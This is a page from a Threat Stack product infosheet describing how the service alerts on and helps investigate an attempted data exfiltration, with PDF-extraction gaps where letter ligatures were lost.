Issue link:

Contents of this Issue


Page 1 of 2

Detect As soon as risky or anomalous behavior trips one of the rules in Threat Stack's out-of-the-box rulesets, teams are alerted in real me and are provided with contextual informa on, including the process that was run, who ran it, the loca on, the severity level, and more. The following alert shows a empted data exfiltra on, which is classified as a Severity 1 alert, indica ng a high possibility of a bad actor. First, Threat Stack presents basic informa on about the alert, such as the source IP, command, user, and event type to give a be er understanding what caused the alert, so operators can take appropriate ac on in accordance with exis ng response workflows. Inves gate On clicking further into this data exfiltra on alert, Threat Stack presents more in-depth informa on to help teams inves gate the true severity of what has happened, including any associated events, other commands run in the session, and informa on on whether it came from outside the network or was an insider threat. In this case, it looks like there was a connec on with a known malicious IP in Ukraine. By looking at other associated events, it appears that this user was able to connect through a known vulnerability and executed commands that gave him or her access to secret compliance files. Threat Stack presents informa on about any addi onal contribu ng events, such as the connec on to a blacklisted IP, thereby giving visibility into the path taken by this bad actor.

Articles in this issue

view archives of Datasheets - Compliance-Awareness-with-Threat-Stack-Infosheet